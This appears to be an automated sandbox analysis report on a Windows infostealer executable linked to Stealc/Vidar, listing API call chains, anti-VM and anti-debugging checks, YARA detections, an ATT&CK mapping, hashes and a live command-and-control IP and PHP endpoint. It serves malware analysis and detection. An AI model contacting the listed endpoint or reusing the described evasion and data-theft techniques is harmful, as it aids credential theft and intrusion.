Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0230E697
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0230EF87
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_023147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_023147D7
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0230DCE7
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
Source: Amcache.hve.3.dr | Binary or memory string: VMware
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware(
Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-28977
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-28964
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-28967
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-30399
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-28986
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-29007
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-28806
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API call chain: ExitProcess graph end node graph_0-28852
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 0_2_004045C0
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h] 0_2_00419750
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_007F1171 push dword ptr fs:[00000030h] 0_2_007F1171
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230092B mov eax, dword ptr fs:[00000030h] 0_2_0230092B
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_023199B7 mov eax, dword ptr fs:[00000030h] 0_2_023199B7
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02300D90 mov eax, dword ptr fs:[00000030h] 0_2_02300D90
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0231D151 SetUnhandledExceptionFilter,0_2_0231D151
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0231AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0231AFAF
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0231B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0231B5A1
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Memory protected: page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: is65NMeWkV.exe PID: 8, type: MEMORYSTR
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02319867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_02319867
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_02317DF7
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

Source: Yara match | File source: 0.2.is65NMeWkV.exe.2300e67.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.is65NMeWkV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.is65NMeWkV.exe.2350000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.is65NMeWkV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.is65NMeWkV.exe.2350000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.is65NMeWkV.exe.2300e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: is65NMeWkV.exe PID: 8, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                      Remote Access Functionality

Source: Yara match | File source: 0.2.is65NMeWkV.exe.2300e67.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.is65NMeWkV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.is65NMeWkV.exe.2350000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.is65NMeWkV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.is65NMeWkV.exe.2350000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.is65NMeWkV.exe.2300e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: is65NMeWkV.exe PID: 8, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; a leading number is the count of matching signatures for that technique, techniques without a number were listed but not matched)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: 12 Native API, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: 11 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: 1 Masquerading, 1 Virtualization/Sandbox Evasion, 11 Disable or Modify Tools, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 22 Software Packing, 1 DLL Side-Loading
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: 2 System Time Discovery, 31 Security Software Discovery, 1 Virtualization/Sandbox Evasion, 11 Process Discovery, 1 Account Discovery, 1 System Owner/User Discovery, 1 File and Directory Discovery, 123 System Information Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: 2 Encrypted Channel, 2 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label | Link
is65NMeWkV.exe | 100% | Avira | HEUR/AGEN.1306978 |
is65NMeWkV.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://upx.sf.net | 0% | URL Reputation | safe |
                      No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://109.107.157.208/49aaa1bd4c594849.php | true | | unknown
http://109.107.157.208/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://109.107.157.208/49aaa1bd4c594849.php/ | is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.3.dr | false | URL Reputation: safe | unknown
http://109.107.157.208 | is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://109.107.157.208/49aaa1bd4c594849.php(K | is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://109.107.157.208/ws | is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://109.107.157.208/49aaa1bd4c594849.phplK | is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
109.107.157.208 | unknown | unknown | 29314 | VECTRANET-AS Al Zwyciestwa 253 81-525 Gdynia Poland PL | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1541240
                                    Start date and time:2024-10-24 15:56:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:is65NMeWkV.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:5d0d37171e8ed9fc0b97e8f858133802.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@2/5@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 23
                                    • Number of non-executed functions: 169
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes were analyzed; the report is missing behavior information
                                    • VT rate limit hit for: is65NMeWkV.exe
                                    Time | Type | Description
                                    09:57:19 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                    109.107.157.208 | T220UXIoKO.exe | Get hash | malicious | Stealc, Vidar | Browse | 109.107.157.208/49aaa1bd4c594849.php
                                    No context
                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                    VECTRANET-AS Al Zwyciestwa 253 81-525 Gdynia Poland PL | T220UXIoKO.exe | Get hash | malicious | Stealc, Vidar | Browse | 109.107.157.208
                                     | arm5.elf | Get hash | malicious | Unknown | Browse | 178.235.230.100
                                     | la.bot.powerpc.elf | Get hash | malicious | Unknown | Browse | 178.235.82.120
                                     | la.bot.powerpc.elf | Get hash | malicious | Unknown | Browse | 78.88.71.211
                                     | jade.x86.elf | Get hash | malicious | Mirai | Browse | 95.160.85.220
                                     | la.bot.arm5.elf | Get hash | malicious | Unknown | Browse | 78.88.9.121
                                     | nuklear.arm.elf | Get hash | malicious | Unknown | Browse | 93.105.146.207
                                     | eLSH927bGM.elf | Get hash | malicious | Unknown | Browse | 93.105.146.209
                                     | na.elf | Get hash | malicious | Mirai | Browse | 93.105.223.164
                                     | file.exe | Get hash | malicious | Unknown | Browse | 88.156.92.211
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9711660713636462
                                    Encrypted:false
                                    SSDEEP:96:nv/49EeKZbn7sFChsow7Rr6tQXIDcQnc6MHcE0cw3w+HbHg/PB6HeaOy1EaGHh4B:vhVb7q0JC+NjGcZrP2izuiF6Z24IO8C
                                    MD5:4BACBEC4411EFCECD84120FBB3A98DAA
                                    SHA1:519EFD6DEBD96B1D9574295DFDE5938B4AF6B165
                                    SHA-256:73655ACB3D61F59044F0E3029441476B45A17DE44A445F1883C4A41496E561D1
                                    SHA-512:4257227EF0470CA7C70C54F18A27EF926447356E6C9D32BA61179BCBB741AACD665CB45DF7DC7536F14AE5E49C6CA7E0AFF787B694E37BEED7B702B128DEF844
                                    Malicious:true
                                    Reputation:low
                                    Preview (UTF-16 decoded):
                                    Version=1
                                    EventType=BEX
                                    EventTime=133742518221144665
                                    ReportType=2
                                    Consent=1
                                    UploadTime=133742518225207247
                                    ReportStatus=655456
                                    ReportIdentifier=2347bed7-3964-4883-856a-43aa24a4bfda
                                    IntegratorReportIdentifier=81160891-8f6e-4f90-915b-51bd23bf5074
                                    Wow64Host=34404
                                    Wow64Guest=332
                                    NsAppName=is65NMeWkV.exe
                                    AppSessionGuid=00000008-0001-0014-52c7-7b981c26db01
                                    TargetAppId=W:0006c4b9a520796bd6f1f2cdc066790cfdba0000ffff!0000f0b9f7060cd7e857d53a740e7e025d4d75f7ab27!is65NMeWkV.exe
                                    TargetAppVer=2 (preview truncated)
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Thu Oct 24 13:57:02 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):63484
                                    Entropy (8bit):1.8882490483185832
                                    Encrypted:false
                                    SSDEEP:192:du9cwXMnHR9XtOQOJwLzM8uR1Ec1+NHtd19UWu4jqJbcBc3GkfKdW3njzbZY1N8b:8WnHRaQEOMDRX+dEnDG5o3jq1Krf
                                    MD5:26BE34AFEC5462A9B9F71E5262BB44A2
                                    SHA1:4B56B64BE1C7A42C9D7393E2D6B88CF99E3902F5
                                    SHA-256:C3EBC87FF978F62384EEF7A551FDEAF538B2205A7C37C6BF04DF89EA743754E4
                                    SHA-512:AEF508B83C979203C3F52C11CCBBD7A904B7A97BF2F655AAF40B610C093428EEF4EECE629030FF020046F96EE04A0B0022D8D1BDBCECEA2DA101750E01FD2CF3
                                    Malicious:false
                                    Reputation:low
                                    Preview: MDMP (minidump) header; recoverable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8432
                                    Entropy (8bit):3.6988034988737195
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJkz6Vs6Y9fSUXCiDgmfcwpD089bzKsf9xm:R6lXJA6Vs6YlSUXCegmfcMzpfi
                                    MD5:B5052E5874E09AE2FFEC446E4ED1C2D8
                                    SHA1:5DF8E3D2522B9758266F899BAE208FA33E048C68
                                    SHA-256:C980724D11A6B31F6986398FB6E0CFE36392BBADF6E22F0E3DFEC70F6C9FA2D9
                                    SHA-512:8EBD8A038F2383562D177B3B585D4A0452E7DF79D07E82857765461B86D855FA56A3A7C602BE2752FD99CA61AA083FDF00E08B6710FFE5F41BFEDF1F285DA41B
                                    Malicious:false
                                    Reputation:low
                                    Preview (UTF-16 decoded):
                                    <?xml version="1.0" encoding="UTF-16"?>
                                    <WERReportMetadata>
                                     <OSVersionInformation>
                                      <WindowsNTVersion>10.0</WindowsNTVersion>
                                      <Build>19045</Build>
                                      <Product>(0x30): Windows 10 Pro</Product>
                                      <Edition>Professional</Edition>
                                      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
                                      <Revision>2006</Revision>
                                      <Flavor>Multiprocessor Free</Flavor>
                                      <Architecture>X64</Architecture>
                                      <LCID>2057</LCID>
                                     </OSVersionInformation>
                                     <ProcessInformation>
                                      <Pid>8</Pid>
                                    (preview truncated)
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4724
                                    Entropy (8bit):4.483742601969905
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsoJg77aI9J2WpW8VYcYm8M4JwkCO3FT+q8vqkCOw2xQkSad:uIjfuI7DX7V4J0mKWExPSad
                                    MD5:29D91479A7CBA0F431FF5DD830A899EC
                                    SHA1:8C825FD5AAFFA0D0EC2E4798077183CBE0AA8023
                                    SHA-256:A1DE463908353A5AD5A4A022EF8300CFFCCA1E6711408BB316BDEFBA600B06E3
                                    SHA-512:BEADAE37C80551EF2AAFC30641F264BE868BC50BC335EEB12A0CEF9DC165BE0FBE4E80A2D72DE76DCD4D8B9C53C1889A284ED04D9A668FB5E6AB85B45BBB15C5
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="557579" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.465440078752722
                                    Encrypted:false
                                    SSDEEP:6144:5IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbk:KXD94+WlLZMM6YFHB+k
                                    MD5:846BD9A4A292F1BE5FCCDC3CF9305EC5
                                    SHA1:E515783AB9766F02FA0F96D4A8D433A290DB244B
                                    SHA-256:83A2DC0617DCE8D32F8B62E771A82B8B53E7F4EC81CF03847ABD0220C763EB21
                                    SHA-512:596D7C5881D41F40234F199D27AF64E16B5FF6B971E3F8C1762CBBAF7BD91697B5B6C74DD8A8B574A42FC05EB09398E1753448A152F6CFB6F12C233C981B4EEE
                                    Malicious:false
                                    Reputation:low
                                    Preview: regf (registry hive) header; recoverable string: \AppCompat\Programs\Amcache.hve
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.4431888700013955
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:is65NMeWkV.exe
                                    File size:399'360 bytes
                                    MD5:5d0d37171e8ed9fc0b97e8f858133802
                                    SHA1:f0b9f7060cd7e857d53a740e7e025d4d75f7ab27
                                    SHA256:0d90d3771d5a6c15760e18a6f2a542076d7c7c73c02d31c33dfee2f6f7bed61c
                                    SHA512:fd1b7e887f9c27394d365f01be42132ecfb94970e8daf732fba249b2371123adfc718c6e277f34c759cac8c8ab08dd093ec396cedaad18d290cac2b1477b0e14
                                    SSDEEP:6144:e9LX/SNfdnuHt939e/pA6NoQmdbZKYJncY4dlxnc0rjuVH/kWTW:GEfRuN934//oQmBZf5Qldc8juJj
                                    TLSH:C984F15436A0F471C5520D304C28C7F8A93FB832DA69994B771C7F5F3D3A392AA66706
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z...Z...Z...D...z...D...B...D.......}3.._...Z...'...D...[...D...[...D...[...RichZ...................PE..L......e...........
                                    Icon Hash:63796de971636e0f
                                    Entrypoint:0x403a18
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x65DDD6F9 [Tue Feb 27 12:35:05 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:60292dd185c67d0ddd8dc10e8ecfb2bb
                                    Instruction
                                    call 00007FEBA4943B79h
                                    jmp 00007FEBA493F39Eh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    call 00007FEBA493F55Ch
                                    xchg cl, ch
                                    jmp 00007FEBA493F544h
                                    call 00007FEBA493F553h
                                    fxch st(0), st(1)
                                    jmp 00007FEBA493F53Bh
                                    fabs
                                    fld1
                                    mov ch, cl
